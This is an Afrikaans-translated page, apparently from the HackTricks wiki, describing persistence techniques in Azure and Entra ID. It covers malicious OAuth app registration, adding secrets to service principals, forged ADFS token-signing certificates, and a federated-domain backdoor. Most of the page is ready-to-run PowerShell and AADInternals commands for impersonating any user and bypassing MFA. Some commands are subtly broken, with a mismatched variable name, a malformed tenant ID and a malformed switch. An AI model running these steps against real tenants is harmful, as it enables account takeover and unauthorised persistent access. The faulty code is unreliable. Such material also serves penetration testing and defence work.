3.2 KiB
Az - Persistensie
{{#include ../../../banners/hacktricks-training.md}}
OAuth Toepassing
Deur die standaard kan enige gebruiker 'n toepassing in Entra ID registreer. So kan jy 'n toepassing registreer (slegs vir die teiken huur) wat hoë impak toestemmings benodig met administratorkonsent (en dit goedkeur as jy die admin is) - soos om e-pos namens 'n gebruiker te stuur, rolbestuur, ens. Dit sal ons toelaat om phishing-aanvalle uit te voer wat baie vrugbaar sal wees in die geval van sukses.
Boonop kan jy ook daardie toepassing met jou gebruiker aanvaar as 'n manier om toegang daaroor te behou.
Toepassings en Diens Prinsipale
Met voorregte van Toepassing Administrateur, GA of 'n pasgemaakte rol met microsoft.directory/applications/credentials/update toestemmings, kan ons kredensiale (geheime of sertifikaat) aan 'n bestaande toepassing voeg.
Dit is moontlik om 'n toepassing met hoë toestemmings te teiken of 'n nuwe toepassing met hoë toestemmings toe te voeg.
'n Interessante rol om by die toepassing te voeg, sou die Privileged authentication administrator role wees, aangesien dit toelaat om die wagwoord te herstel van Globale Administrators.
Hierdie tegniek laat ook toe om MFA te omseil.
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
- Vir sertifikaat-gebaseerde outentisering
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
Federasie - Token Onderteken Sertifikaat
Met DA bevoegdhede op on-prem AD, is dit moontlik om nuwe Token onderteken en Token Decrypt sertifikate te skep en in te voer wat 'n baie lang geldigheid het. Dit sal ons in staat stel om in te log as enige gebruiker wie se ImuutableID ons ken.
Voer die onderstaande opdrag uit as DA op die ADFS bediener(s) om nuwe sertifikate te skep (standaard wagwoord 'AADInternals'), voeg dit by ADFS, deaktiveer outomatiese hernuwing en herbegin die diens:
New-AADIntADFSSelfSignedCertificates
Dan, werk die sertifikaatinligting met Azure AD op:
Update-AADIntADFSFederationSettings -Domain cyberranges.io
Federasie - Betroubare Domein
Met GA-privileges op 'n tenant, is dit moontlik om 'n nuwe domein toe te voeg (moet geverifieer word), sy autentikasietipe na Federated te konfigureer en die domein te vertrou op 'n spesifieke sertifikaat (any.sts in die onderstaande opdrag) en uitreiker:
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
Verwysings
{{#include ../../../banners/hacktricks-training.md}}